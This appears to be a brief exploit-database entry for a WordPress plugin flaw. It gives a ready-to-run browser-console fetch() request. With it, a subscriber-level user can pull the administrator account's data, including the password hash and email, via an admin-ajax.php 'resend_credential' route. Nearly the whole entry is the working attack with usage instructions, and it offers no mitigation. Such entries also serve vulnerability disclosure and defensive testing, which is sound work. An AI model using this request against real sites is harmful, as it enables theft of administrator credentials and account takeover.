Share
## https://sploitus.com/exploit?id=WPEX-ID:85CC39B1-416F-4D23-84C1-FDCBFFB0DDA0
Run the below command in the developer console of the web browser while being on the blog as susbscriber user. This will return all user data, including the hashed password and email address of the user with ID 1 (usually the administrator)

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=ajax_post&route_name=resend_credential&id=1',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));